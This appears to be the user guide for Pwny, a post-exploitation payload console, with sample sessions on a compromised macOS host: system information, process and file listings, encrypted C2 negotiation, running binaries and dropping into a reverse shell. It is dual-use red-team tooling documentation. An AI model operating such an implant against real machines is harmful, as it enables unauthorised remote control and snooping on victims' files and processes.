Pwny is equipped with powerful console that provides an extensive interface for interacting with payload. Console is different for each system due to that different systems support different commands and plugins. To inspect the list of available commands simply type help.

Pwny interactive shell v1.0.0
Running as felix on /Users/felix

pwny:/Users/felix felix$ help

Core Commands:

    Command    Description
    -------    -----------
    clear      Clear terminal window.
    env        List environment variables.
    exec       Execute path.
    exit       Exit Pwny and terminate connection.
    help       Show all available commands.
    load       Load plugin by name.
    plugins    Show available plugins.
    prompt     Set current prompt line.
    quit       Exit console.
    set        Set environment variable.
    unload     Unload plugin by name.
    unset      Delete environment variable.

... snip ...

Information gathering

The most basic thing that you can do with Pwny is collect information about system and hardware this system is running on. Console displays it in pretty format (neofetch-like style) if used with sysinfo command.

pwny:/Users/felix felix$ sysinfo

         .:'          Name: macOS
     __ :'__        Kernel: 11.7.3
  .'`  `-'  ``.       Time: 2024-05-03 22:33:51 IST (UTC+0100)
 :          .-'     Vendor: Apple
 :         :          Arch: arm64
  :         `-;     Memory: 14.23 GB/16.0 GB
   `.__.-.__.'        UUID: 7b22d2ad-8b8d-496c-b163-f265f35253e1

pwny:/Users/felix felix$ 

Encrypted negotiation

It’s up to you to decide if you want to communicate with target device without encryption. However, worth mentioning that in case of absense of encryption, all commands can be viewed through network analyzers (like WireShark).

You can establish or re-establish secure communication manually using secure command or disable it at any time by typing unsecure.

pwny:/Users/felix felix$ secure
[*] Generating RSA keys...
[*] Exchanging RSA keys for TLS...
[+] RSA keys exchange success!
[+] Communication secured with TLS! 

Pretty output

If there is a huge amount of data to be printed to the screen, Pwny console displays it in less-like format to fit all the data:

pwny:/Users/felix felix$ ps

Process List:

    PID      CPU      Name                Path
    ---      ---      ----                ----
    1        arm64    launchd
    73       arm64    syslogd
    74       arm64    UserEventAgent
    76       arm64    uninstalld
    77       arm64    fseventsd
    79       arm64    mediaremoted
    84       arm64    systemstats
    86       arm64    configd
    87       arm64    endpointsecurity
Press Enter for more, or 'q' to quit:

Auto-completion

Pwny console supports auto-completion. If you type li instead of list it will complete it for you.

pwny:/Users/felix felix$ li

Listing: .:

    Mode         Size         Type         Modified               Name
    ----         ----         ----         --------               ----
    r--------    7.00 B       file         2023-01-28 15:19:51    .CFUserTextEncoding
    rw-------    1.16 KB      file         2024-02-06 01:18:13    .sqlite_history
    rw-------    12.00 B      file         2024-02-24 15:04:39    important.txt

However, if you spell some command wrongly and auto-completion won’t be able to select the appropriate command, it would suggest you the command.

pwny:/Users/felix felix$ ca
[!] Did you mean? cam, cat
[-] Failed to spawn process for ca!
[-] Unrecognized command: ca!

Binaries

Pwny console supports execution of system-wide binaries (i.e. binaries in PATH) as shown below.

pwny:/Users/felix felix$ ls /
Applications
Library
System
Users
Volumes
bin
cores
dev
etc
home
opt
private
sbin
tmp
usr
var

Shell fallback

Want to go back to basic reverse shell? No a problem, Pwny allows you to drop into basic shell.

pwny:/Users/felix felix$ bash
pwd
/Users/felix
whoami
felix
exit

Shortcuts

Type path straight into Pwny console and it will decide: change to the path if it’s a directory or execute path if it’s an executable.

pwny:/Users/felix felix$ /bin/df
Filesystem     512-blocks      Used Available Capacity iused      ifree %iused  Mounted on
/dev/disk3s3s1  965595304  40074232 168331776    20%  553779 4827422741    0%   /
pwny:/Users/felix felix$ /
pwny:/ felix$ pwd
/

Prepending ! to command executes shell command locally.

Environment

Pwny console has its own environment, meaning that setting specific environment variables might affect some features. You can list all environment variables with env command.

pwny:/ felix$ env

Environment Variables:

    Name    Value
    ----    -----
    PATH    /opt/homebrew/sbin:/opt/homebrew/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Verbose mode

If you want to see all the packets that were sent and received, you can enable VERBOSE variable.

pwny:/ felix$ set verbose on
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  db 59 00 00             |.........Y..    |
[i] Read TLV packet (21 bytes, 2 objects)
[i] 00000000  e3 2e 00 00 01 00 00 00  2f ba 0b 00 00 04 00 00 |......../.......|
[i] 00000010  00 01 00 00 00                                   |.....           |
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  0f 52 00 00             |.........R..    |
[i] Read TLV packet (25 bytes, 2 objects)
[i] 00000000  0c 00 00 00 05 00 00 00  66 65 6c 69 78 ba 0b 00 |........felix...|
[i] 00000010  00 04 00 00 00 01 00 00  00                      |.........       |
[i] Sent TLV packet (12 bytes, 1 objects)
[i] 00000000  b9 0b 00 00 04 00 00 00  0f 52 00 00             |.........R..    |
[i] Read TLV packet (25 bytes, 2 objects)
[i] 00000000  0c 00 00 00 05 00 00 00  66 65 6c 69 78 ba 0b 00 |........felix...|
[i] 00000010  00 04 00 00 00 01 00 00  00                      |.........       |